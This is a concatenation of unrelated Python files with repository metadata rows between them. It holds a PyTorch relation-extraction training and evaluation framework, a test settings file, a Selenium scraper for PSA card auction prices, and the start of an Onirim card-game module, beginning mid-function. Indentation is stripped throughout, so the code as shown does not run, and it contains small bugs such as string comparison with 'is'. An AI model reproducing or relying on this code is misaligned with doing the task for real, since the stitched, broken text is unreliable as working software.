ret = set()
for triple in triple_list:
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
if head_only:
_h = triple[0].split(" ")
_t = triple[2].split(" ")
ret.add(tuple((_h[0], _t[0])))
else:
ret.add(tuple((triple[0], triple[2])))
return ret
def _to_triple(triple_list, head_only=False, lang='ENGLISH'):
ret = set()
for triple in triple_list:
# print("lang:{} A:{}".format(lang, triple))
if lang is 'CHINESE':
triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
# print("B:{}".format(triple))
if head_only:
_h = triple[0].split(" ")
_t = triple[2].split(" ")
ret.add(tuple((_h[0], triple[1], _t[0])))
else:
ret.add(tuple((triple[0], triple[1], triple[2])))
return ret
def _load_gold_data(data_gold, data_id, head_only=False, gold_type='EP', lang='ENGLISH'):
_tokens, _triples = data_gold[data_id]
if gold_type == 'EP':
gold_value = _to_ep(_triples, head_only, lang=lang)
elif gold_type == 'sub':
gold_value = _to_sub(_triples, head_only, lang=lang)
elif gold_type == 'obj':
gold_value = _to_obj(_triples, head_only, lang=lang)
elif gold_type == 'ALL':
gold_value = _to_triple(_triples, head_only, lang=lang)
return gold_value, _tokens
def _cal_prf(correct_num, predict_num, gold_num):
eval_p = correct_num / (predict_num + 1e-10)
eval_r = correct_num / (gold_num + 1e-10)
eval_f = 2 * eval_p * eval_r / (eval_p + eval_r + 1e-10)
return eval_p, eval_r, eval_f
class Framework(object):
def __init__(self, con, wandb_log):
self.config = con
self.wandb_log = wandb_log
def train(self, model_pattern):
# initialize the model
ori_model = model_pattern(self.config)
ori_model.cuda()
# define the optimizer
optimizer = optim.Adam(filter(lambda p: p.requires_grad, ori_model.parameters()), lr=self.config.learning_rate)
# whether use multi GPU
if self.config.multi_gpu:
model = nn.DataParallel(ori_model)
else:
model = ori_model
# define the loss function
def loss(gold, pred, mask):
pred = pred.squeeze(-1)
los = F.binary_cross_entropy(pred, gold, reduction='none')
if mask is None:
los = torch.sum(los)/self.config.rel_num
return los
if los.shape != mask.shape:
mask = mask.unsqueeze(-1)
los = torch.sum(los * mask) / torch.sum(mask)
return los
# check the checkpoint dir
if not os.path.exists(self.config.checkpoint_dir):
os.mkdir(self.config.checkpoint_dir)
# get the data loader
train_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.train_prefix, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
dev_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer,
prefix=self.config.test_prefix, is_test=True,
collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
model.train()
global_step = 0
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
best_f1_score = -1
best_test_f1 = 0
best_test_h_f1 = 0
best_epoch = 0
# the training loop
for epoch in range(self.config.max_epoch):
train_data_prefetcher = data_loader.DataPreFetcher(train_data_loader)
data = train_data_prefetcher.next()
while data is not None:
if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails, \
sim_sub_h2t, sim_sub_t2h, sim_obj_h2t, sim_obj_t2h, \
sim_sub_oh, sim_sub_ot, sim_obj_sh, sim_obj_st, pred_rels = model(data)
# entity boundary loss
loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
loss_obj_heads = loss(data['em_obj_heads'], pred_obj_heads, mask=data['mask'])
loss_obj_tails = loss(data['em_obj_tails'], pred_obj_tails, mask=data['mask'])
# entity span loss
loss_sub_h2t = loss(data['sub_h2t'], sim_sub_h2t, mask=data['mask'])
loss_sub_t2h = loss(data['sub_t2h'], sim_sub_t2h, mask=data['mask'])
loss_obj_h2t = loss(data['obj_h2t'], sim_obj_h2t, mask=data['mask'])
loss_obj_t2h = loss(data['obj_t2h'], sim_obj_t2h, mask=data['mask'])
# entity pair loss
loss_sub2objh = loss(data['sub2obj_h'], sim_sub_oh, mask=data['mask'])
loss_sub2objt = loss(data['sub2obj_t'], sim_sub_ot, mask=data['mask'])
loss_obj2subh = loss(data['obj2sub_h'], sim_obj_sh, mask=data['mask'])
loss_obj2subt = loss(data['obj2sub_t'], sim_obj_st, mask=data['mask'])
# relation loss
loss_rel = loss(data['rel_labels'], pred_rels, mask=None)
ent_boundary_loss = loss_sub_heads + loss_sub_tails + loss_obj_heads + loss_obj_tails
ent_span_loss = loss_sub_h2t + loss_sub_t2h + loss_obj_h2t + loss_obj_t2h
ent_pair_loss = loss_sub2objh + loss_sub2objt + loss_obj2subh + loss_obj2subt
total_loss = ent_boundary_loss + ent_span_loss + ent_pair_loss + loss_rel
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
global_step += 1
loss_sum += total_loss.item()
ent_boundary_loss_sum += ent_boundary_loss.item()
ent_span_loss_sum += ent_span_loss.item()
ent_pair_loss_sum += ent_pair_loss.item()
rel_loss_sum += loss_rel.item()
if global_step % self.config.period == 0:
# print(loss_sum)
if self.wandb_log is not None:
self.wandb_log.log({"LOSS_SUM:": loss_sum})
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
data = train_data_prefetcher.next()
elif self.config.model_name == 'Casrel':
pred_sub_heads, pred_sub_tails, pred_s2ro_heads, pred_s2ro_tails = model(data)
# entity boundary loss
loss_sub_heads = loss(data['em_sub_heads'], pred_sub_heads, mask=data['mask'])
loss_sub_tails = loss(data['em_sub_tails'], pred_sub_tails, mask=data['mask'])
# relation loss
loss_s2ro_heads = loss(data['batch_s2ro_heads'], pred_s2ro_heads, mask=data['mask'])
loss_s2ro_tails = loss(data['batch_s2ro_tails'], pred_s2ro_tails, mask=data['mask'])
ent_boundary_loss = loss_sub_heads + loss_sub_tails
rel_loss = loss_s2ro_heads + loss_s2ro_tails
total_loss = ent_boundary_loss + rel_loss
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
global_step += 1
loss_sum += total_loss.item()
ent_boundary_loss_sum += ent_boundary_loss.item()
rel_loss_sum += rel_loss.item()
if global_step % self.config.period == 0:
if self.wandb_log is not None:
self.wandb_log.log({"LOSS_SUM:": loss_sum})
loss_sum = 0
ent_boundary_loss_sum = 0
ent_span_loss_sum = 0
ent_pair_loss_sum = 0
rel_loss_sum = 0
data = train_data_prefetcher.next()
if (epoch + 1) % self.config.test_epoch == 0:
model.eval()
# call the test function
dev_triple_p, dev_triple_r, dev_triple_f, dev_triple_hp, dev_triple_hr, dev_triple_hf, \
dev_ep_p, dev_ep_r, dev_ep_f, dev_ep_hp, dev_ep_hr, dev_ep_hf, \
dev_sub_p, dev_sub_r, dev_sub_f, dev_sub_hp, dev_sub_hr, dev_sub_hf, \
dev_obj_p, dev_obj_r, dev_obj_f, dev_obj_hp, dev_obj_hr, dev_obj_hf = self.test(dev_data_loader, self.config.step_dim, self.config.step_matrix, model)
test_triple_p, test_triple_r, test_triple_f, test_triple_hp, test_triple_hr, test_triple_hf, \
test_ep_p, test_ep_r, test_ep_f, test_ep_hp, test_ep_hr, test_ep_hf, \
test_sub_p, test_sub_r, test_sub_f, test_sub_hp, test_sub_hr, test_sub_hf, \
test_obj_p, test_obj_r, test_obj_f, test_obj_hp, test_obj_hr, test_obj_hf = self.test(test_data_loader,
self.config.step_dim,
self.config.step_matrix,
model)
model.train()
# eval_f1_score
if dev_triple_f > best_f1_score:
best_epoch = epoch
best_f1_score = dev_triple_f
best_test_h_f1 = test_triple_hf
best_test_f1 = test_triple_f
# save the best model
path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
if not self.config.debug:
torch.save(ori_model.state_dict(), path)
if self.wandb_log is not None:
self.wandb_log.log({
"BEST_EPOCH:": best_epoch,
"DEV_Triple_F1": dev_triple_f,
"DEV_TripleH_F1": dev_triple_hf,
"DEV_EP_F1": dev_ep_f,
"DEV_SUB_F1": dev_sub_f,
"DEV_OBJ_F1": dev_obj_f,
"DEV_EPH_F1": dev_ep_hf,
"DEV_SUBH_F1": dev_sub_hf,
"DEV_OBJH_F1": dev_obj_hf,
"best_test_h_f1": best_test_h_f1,
"best_test_f1": best_test_f1,
"current_epoch": epoch})
# manually release the unused cache
torch.cuda.empty_cache()
def cal_sub_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
_head_prob = pred_heads[0][head_idx][0].tolist()
_tail_prob = pred_tails[0][tail_idx][0].tolist()
_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_head_mapping[0][0][head_idx] = 1
_tail_mapping[0][0][tail_idx] = 1
_head_mapping = _head_mapping.to(encoded_txt)
_tail_mapping = _tail_mapping.to(encoded_txt)
sub_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)
# predict entity span
sim_ent_ht, sim_ent_th = model.sub_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
_h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
_t2h_prob = sim_ent_th[0][head_idx][0].tolist()
# span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob
# trans head idx
sim_ent_gh, sim_ent_gt = model.sub_entity_trans(sub_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()
return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob
def cal_obj_prob(self, head_idx, tail_idx, trans_head_idx, trans_tail_idx, pred_heads, pred_tails, head_walk_step, tail_walk_step, model, encoded_txt, seq_len):
_head_prob = pred_heads[0][head_idx][0].tolist()
_tail_prob = pred_tails[0][tail_idx][0].tolist()
_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
_head_mapping[0][0][head_idx] = 1
_tail_mapping[0][0][tail_idx] = 1
_head_mapping = _head_mapping.to(encoded_txt)
_tail_mapping = _tail_mapping.to(encoded_txt)
obj_span = model.gen_span_emb(torch.LongTensor([head_idx]), torch.LongTensor([tail_idx]), encoded_txt)
# predict entity span
sim_ent_ht, sim_ent_th = model.obj_span_trans(_head_mapping, _tail_mapping, head_walk_step, tail_walk_step, encoded_txt, seq_len)
_h2t_prob = sim_ent_ht[0][tail_idx][0].tolist()
_t2h_prob = sim_ent_th[0][head_idx][0].tolist()
# span_prob = _head_prob * _h2t_prob + _tail_prob * _t2h_prob
# trans head idx
sim_ent_gh, sim_ent_gt = model.obj_entity_trans(obj_span, head_walk_step, tail_walk_step, encoded_txt, seq_len)
trans_head_prob = sim_ent_gh[0][trans_head_idx][0].tolist()
trans_tail_prob = sim_ent_gt[0][trans_tail_idx][0].tolist()
return _head_prob, _h2t_prob, _tail_prob, _t2h_prob, trans_head_prob, trans_tail_prob
def cal_rel_prob(self, sub_head_idx, sub_tail_idx, obj_head_idx, obj_tail_idx, model, encoded_txt, rel_bar=0.5):
sub_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
sub_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
sub_head_mapping[0][0][sub_head_idx] = 1
sub_tail_mapping[0][0][sub_tail_idx] = 1
sub_head_mapping = sub_head_mapping.to(encoded_txt)
sub_tail_mapping = sub_tail_mapping.to(encoded_txt)
obj_head_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
obj_tail_mapping = torch.Tensor(1, 1, encoded_txt.size(1)).zero_()
obj_head_mapping[0][0][obj_head_idx] = 1
obj_tail_mapping[0][0][obj_tail_idx] = 1
obj_head_mapping = obj_head_mapping.to(encoded_txt)
obj_tail_mapping = obj_tail_mapping.to(encoded_txt)
pred_rels = model.rel_classification(sub_head_mapping, sub_tail_mapping, obj_head_mapping, obj_tail_mapping, encoded_txt)
pred_rels_idx = np.where(pred_rels.cpu()[0] > rel_bar)[0]
return pred_rels_idx
def _cal_ep_score(self, sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob):
_score = sub_span_prob*sub_trans_prob + obj_span_prob*obj_trans_prob
return _score
def test(self, x_data_loader, step_dim, step_matrix, model):
test_data_prefetcher = data_loader.DataPreFetcher(x_data_loader)
data = test_data_prefetcher.next()
pred_eps_id = list()
data_id = 0
data_gold = list()
id2rel = json.load(open(os.path.join(self.config.data_path, 'rel2id.json')))[0]
print(id2rel)
def make_step(sample_idx, text_len):
walk_step = np.zeros((text_len, step_dim))
for i in range(text_len):
walk_step[i] = step_matrix[i - sample_idx + self.config.max_len]
walk_step_t = torch.Tensor(walk_step)
walk_step_t = walk_step_t.unsqueeze(0)
walk_step_t = walk_step_t.to(torch.device('cuda'))
return walk_step_t
while data is not None:
with torch.no_grad():
token_ids = data['token_ids']
tokens = data['tokens'][0]
mask = data['mask']
gold_triples = data['triples'][0]
data_gold.append((tokens, gold_triples))
seq_len = len(tokens)
encoded_text = model.get_encoded_text(token_ids, mask)
if self.config.model_name == 'SGCN' or self.config.model_name == 'SGCN_NO_STEP':
pred_sub_heads, pred_sub_tails, pred_obj_heads, pred_obj_tails = model.pred_entity_boundary(encoded_text)
_bar = 0.1
max_span_len = 30
span_sub_heads = np.where(pred_sub_heads.cpu()[0] > _bar)[0]
span_sub_tails = np.where(pred_sub_tails.cpu()[0] > _bar)[0]
span_obj_heads = np.where(pred_obj_heads.cpu()[0] > _bar)[0]
span_obj_tails = np.where(pred_obj_tails.cpu()[0] > _bar)[0]
pred_eps = dict()
for _sub_head_idx in span_sub_heads:
for _sub_tail_idx in span_sub_tails:
for _obj_head_idx in span_obj_heads:
for _obj_tail_idx in span_obj_tails:
if _sub_head_idx <= _sub_tail_idx and _obj_head_idx <= _obj_tail_idx and (_sub_tail_idx - _sub_head_idx) < max_span_len and (_obj_tail_idx - _obj_head_idx) < max_span_len:
sub_head_walk_step = make_step(_sub_head_idx, seq_len)
sub_tail_walk_step = make_step(_sub_tail_idx, seq_len)
obj_head_walk_step = make_step(_obj_head_idx, seq_len)
obj_tail_walk_step = make_step(_obj_tail_idx, seq_len)
# cal span prob and trans prob
sub_head_prob, sub_h2t_prob, sub_tail_prob, sub_t2h_prob, sub_trans_head_prob, sub_trans_tail_prob = \
self.cal_sub_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, pred_sub_heads, pred_sub_tails, sub_head_walk_step, sub_tail_walk_step, model, encoded_text, seq_len)
obj_head_prob, obj_h2t_prob, obj_tail_prob, obj_t2h_prob, obj_trans_head_prob, obj_trans_tail_prob = \
self.cal_obj_prob(_obj_head_idx, _obj_tail_idx, _sub_head_idx, _sub_tail_idx, pred_obj_heads, pred_obj_tails, obj_head_walk_step, obj_tail_walk_step, model, encoded_text, seq_len)
sub_span_prob = sub_head_prob * sub_h2t_prob + sub_tail_prob * sub_t2h_prob
obj_span_prob = obj_head_prob * obj_h2t_prob + obj_tail_prob * obj_t2h_prob
sub_trans_prob = sub_trans_head_prob * sub_trans_tail_prob
obj_trans_prob = obj_trans_head_prob * obj_trans_tail_prob
ep_score = self._cal_ep_score(sub_span_prob, obj_span_prob, sub_trans_prob, obj_trans_prob)
if ep_score > 2.5:
pred_rels_idx = self.cal_rel_prob(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, model, encoded_text)
for rel_idx in pred_rels_idx:
rel_idx = str(rel_idx)
if (_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx]) not in pred_eps:
pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
else:
if ep_score > pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])]:
pred_eps[(_sub_head_idx, _sub_tail_idx, _obj_head_idx, _obj_tail_idx, id2rel[rel_idx])] = ep_score
else:
ent_bar = 0.5
rel_bar = 0.5
pred_eps = dict()
pred_sub_heads, pred_sub_tails = model.get_subs(encoded_text)
sub_heads, sub_tails = np.where(pred_sub_heads.cpu()[0] > ent_bar)[0], \
np.where(pred_sub_tails.cpu()[0] > ent_bar)[0]
subjects = []
for sub_head in sub_heads:
sub_tail = sub_tails[sub_tails >= sub_head]
if len(sub_tail) > 0:
sub_tail = sub_tail[0]
subject = tokens[sub_head: sub_tail]
subjects.append((subject, sub_head, sub_tail))
if subjects:
triple_list = []
# [subject_num, seq_len, bert_dim]
repeated_encoded_text = encoded_text.repeat(len(subjects), 1, 1)
# [subject_num, 1, seq_len]
sub_head_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
sub_tail_mapping = torch.Tensor(len(subjects), 1, encoded_text.size(1)).zero_()
for subject_idx, subject in enumerate(subjects):
sub_head_mapping[subject_idx][0][subject[1]] = 1
sub_tail_mapping[subject_idx][0][subject[2]] = 1
sub_tail_mapping = sub_tail_mapping.to(repeated_encoded_text)
sub_head_mapping = sub_head_mapping.to(repeated_encoded_text)
pred_obj_heads, pred_obj_tails = model.get_objs_for_specific_sub(sub_head_mapping,
sub_tail_mapping,
repeated_encoded_text)
for subject_idx, subject in enumerate(subjects):
obj_heads, obj_tails = np.where(pred_obj_heads.cpu()[subject_idx] > rel_bar), np.where(pred_obj_tails.cpu()[subject_idx] > rel_bar)
for obj_head, rel_head in zip(*obj_heads):
for obj_tail, rel_tail in zip(*obj_tails):
if obj_head <= obj_tail and rel_head == rel_tail:
ep_score = pred_obj_tails.cpu()[subject_idx][obj_head][rel_head].item()
rel_head = str(rel_head)
if (subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head]) not in pred_eps:
pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
else:
if ep_score > pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])]:
pred_eps[(subject[1], subject[2], obj_head, obj_tail, id2rel[rel_head])] = ep_score
break
for _ep in pred_eps:
pred_eps_id.append((_ep[0], _ep[1], _ep[2], _ep[3], pred_eps[_ep], data_id, _ep[4]))
data_id += 1
data = test_data_prefetcher.next()
pred_eps_id = sorted(pred_eps_id, key=lambda x: x[4], reverse=True)
def element_prf(pred_eps_id, data_gold, head_only=False, gold_type='EP', lang='ENGLISH'):
correct_num, pred_num, gold_num = 0, 0, 0
v_pred_entity_pair = set()
# To calculate gold number
for item in data_gold:
gold_triples = item[1]
if gold_type == 'EP':
gold_info = _to_ep(gold_triples, head_only, lang=lang)
elif gold_type == 'sub':
gold_info = _to_sub(gold_triples, head_only, lang=lang)
elif gold_type == 'obj':
gold_info = _to_obj(gold_triples, head_only, lang=lang)
elif gold_type == 'ALL':
gold_info = _to_triple(gold_triples, head_only, lang=lang)
# print(head_only, gold_info)
gold_num += len(gold_info)
# print("gold_type:{}, gold_num:{}".format(gold_type, gold_num))
for _eps_id in pred_eps_id:
gold_results, _tokens = _load_gold_data(data_gold, _eps_id[5], head_only, gold_type, lang=lang)
sub = _tokens[_eps_id[0]: _eps_id[1]+1]
sub = self.config.tokenizer.convert_tokens_to_string(sub)
if lang is 'CHINESE':
sub = sub.replace(' ', '')
sub = sub.replace('$', ' ')
sub = sub.strip().replace(" - ", "-")
if head_only:
sub = sub.split(" ")[0]
obj = _tokens[_eps_id[2]: _eps_id[3]+1]
obj = self.config.tokenizer.convert_tokens_to_string(obj)
# obj = ''.join([i.lstrip("##") for i in obj])
#obj = ' '.join(obj.split('[unused1]'))
obj = obj.strip().replace(" - ", "-")
if lang is 'CHINESE':
obj = obj.replace(' ', '')
obj = obj.replace('$', ' ')
if head_only:
obj = obj.split(" ")[0]
rel = _eps_id[6]
if gold_type == 'EP':
pred_info = (sub, obj, _eps_id[5])
elif gold_type == 'sub':
pred_info = (sub, _eps_id[5])
elif gold_type == 'obj':
pred_info = (obj, _eps_id[5])
elif gold_type == 'ALL':
pred_info = (sub, rel, obj, _eps_id[5])
if pred_info not in v_pred_entity_pair:
v_pred_entity_pair.add(pred_info)
else:
continue
if gold_type == 'EP':
pred_info = (sub, obj)
elif gold_type == 'sub':
pred_info = (sub)
elif gold_type == 'obj':
pred_info = (obj)
elif gold_type == 'ALL':
pred_info = (sub, rel, obj)
# print(head_only, pred_info)
if pred_info in gold_results:
correct_num += 1
#else:
# if gold_type == 'ALL' and head_only == False:
# print("pred_info:{}".format(pred_info))
# print("gold_results:{}".format(gold_results))
pred_num += 1
p, r, f = _cal_prf(correct_num, pred_num, gold_num)
print("gold_type:{} head_only:{} gold_num:{} pred_num:{} correct_num:{}, p:{},r:{},f:{},".format(gold_type, head_only, gold_num, pred_num, correct_num, p, r, f))
return p, r, f
# print(pred_eps_id)
triple_p, triple_r, triple_f = element_prf(pred_eps_id, data_gold, gold_type='ALL', lang=self.config.dataset_lang)
triple_hp, triple_hr, triple_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='ALL', lang=self.config.dataset_lang)
ep_p, ep_r, ep_f = element_prf(pred_eps_id, data_gold, gold_type='EP', lang=self.config.dataset_lang)
ep_hp, ep_hr, ep_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='EP', lang=self.config.dataset_lang)
sub_p, sub_r, sub_f = element_prf(pred_eps_id, data_gold, gold_type='sub', lang=self.config.dataset_lang)
sub_hp, sub_hr, sub_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='sub', lang=self.config.dataset_lang)
obj_p, obj_r, obj_f = element_prf(pred_eps_id, data_gold, gold_type='obj', lang=self.config.dataset_lang)
obj_hp, obj_hr, obj_hf = element_prf(pred_eps_id, data_gold, head_only=True, gold_type='obj', lang=self.config.dataset_lang)
return triple_p, triple_r, triple_f, triple_hp, triple_hr, triple_hf, \
ep_p, ep_r, ep_f, ep_hp, ep_hr, ep_hf, \
sub_p, sub_r, sub_f, sub_hp, sub_hr, sub_hf, \
obj_p, obj_r, obj_f, obj_hp, obj_hr, obj_hf
def testall(self, model_pattern):
model = model_pattern(self.config)
path = os.path.join(self.config.checkpoint_dir, self.config.model_save_name)
model.load_state_dict(torch.load(path))
model.cuda()
model.eval()
test_data_loader = data_loader.get_loader(self.config, tokenizer=self.config.tokenizer, prefix=self.config.dev_prefix, is_test=True, collate_fn=partial(cmed_collate_fn, num_rels=self.config.rel_num))
self.test(test_data_loader, self.config.step_dim, self.config.step_matrix, model)
return
| 48.786164
| 223
| 0.561718
| 4,093
| 31,028
| 3.831664
| 0.071341
| 0.035707
| 0.013008
| 0.011222
| 0.629599
| 0.557738
| 0.495824
| 0.459351
| 0.423197
| 0.398648
| 0
| 0.015954
| 0.339403
| 31,028
| 635
| 224
| 48.862992
| 0.749183
| 0.040222
| 0
| 0.321586
| 0
| 0
| 0.02536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037445
| false
| 0
| 0.022026
| 0
| 0.096916
| 0.004405
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1c88d2448c823f942e8276b943c094ce146f49b
| 799
|
py
|
Python
|
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
tests/settings.py
|
rjw57/componentsdb
|
7e5fd96d3afbbcde09d2f7fba1d6c86975e41272
|
[
"MIT"
] | null | null | null |
"""
Settings for application when being run in the test suite.
"""
import os
import sys
# Add the directory containing this file to the search path
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# Import function to generate a self-signed cert dynamically
from x509cert import gen_self_signed_cert
DEBUG = True
TESTING = True
SECRET_KEY = 'bonjour, monde'
# Configure the testing database. The database URI is specified by the
# COMPONENTSDB_DATABASE_URI environment variable.
SQLALCHEMY_DATABASE_URI = os.environ.get(
'COMPONENTSDB_DATABASE_URI', 'sqlite://'
)
SQLALCHEMY_ECHO = True
_cert, _key = gen_self_signed_cert()
GOOGLE_OAUTH2_CERTS = {'selfsigned': _cert}
GOOGLE_OAUTH2_ALLOWED_CLIENT_IDS = ['my-client']
TESTING_GOOGLE_OAUTH2_CERT_PRIV_KEYS = {'selfsigned': _key}
| 26.633333
| 70
| 0.787234
| 113
| 799
| 5.274336
| 0.575221
| 0.073826
| 0.07047
| 0.057047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008608
| 0.12766
| 799
| 29
| 71
| 27.551724
| 0.846485
| 0.366708
| 0
| 0
| 0
| 0
| 0.156187
| 0.05071
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1cbb897fe4f7aa594e93ad56844d2bed4a73d65
| 1,995
|
py
|
Python
|
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
# Module to scrap all auction listings on the auction prices page
from selenium import webdriver
from bs4 import BeautifulSoup
import csv
import os
# Utility to write as .csv file format
def save_to_csv(data, SAVE_PATH, MODE):
if not os.path.exists(SAVE_PATH.split('/')[0]):
os.makedirs(SAVE_PATH.split('/')[0])
fileWriter = csv.DictWriter(open(SAVE_PATH, MODE), data[0].keys(), delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
fileWriter.writeheader()
fileWriter.writerows(data)
# Selenium Driver Handler
def load_driver(SELENIUM_EXECUTABLE_PATH=r'/mnt/c/Users/adity/Downloads/Chrome/geckodriver-v0.27.0-win64/geckodriver.exe'):
driver = webdriver.Firefox(executable_path=SELENIUM_EXECUTABLE_PATH)
return driver
# Main handler controlling all auction listing parsing
def fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, MODE):
driver = load_driver()
driver.get(AUCTION_PRICES_PATH)
soup=BeautifulSoup(driver.page_source, features="lxml")
auction_items = soup.find_all("table", attrs={"class": "auction-summary-results"})
auction_data = []
# Iteratiing over full-auction set
for item in auction_items:
item_info = {}
item_info['name'] = item.find('a').contents[0]
item_info['url'] = BASE_PATH + item.find('a')['href']
item_info['count'] = int(item.findAll('td')[-1].contents[0])
item_info['category'] = 'basketball_cards'
auction_data.append(item_info)
# Write to file
save_to_csv(auction_data, SAVE_PATH, MODE)
driver.quit()
return
# Entry-point of the progran
def main():
BASE_PATH='https://www.psacard.com'
AUCTION_PRICES_PATH=BASE_PATH + '/auctionprices/#2basketball%20cards%7Cbasketb'
SAVE_PATH='logs/allauctionprices.csv'
fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, 'w')
# Capability for stand-alone execution
if __name__ == '__main__':
main()
| 37.641509
| 128
| 0.700752
| 264
| 1,995
| 5.07197
| 0.465909
| 0.047797
| 0.035848
| 0.04705
| 0.093353
| 0.074683
| 0.074683
| 0.074683
| 0.074683
| 0.074683
| 0
| 0.01036
| 0.177444
| 1,995
| 52
| 129
| 38.365385
| 0.805606
| 0.144361
| 0
| 0
| 0
| 0.027778
| 0.160389
| 0.103281
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ccaa26614fd533c6b9140b49b0a5e2c602d313
| 3,343
|
py
|
Python
|
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
"""Location cards."""
import logging
from onirim.card._base import ColorCard
from onirim import exception
from onirim import util
LOGGER = logging.getLogger(__name__)
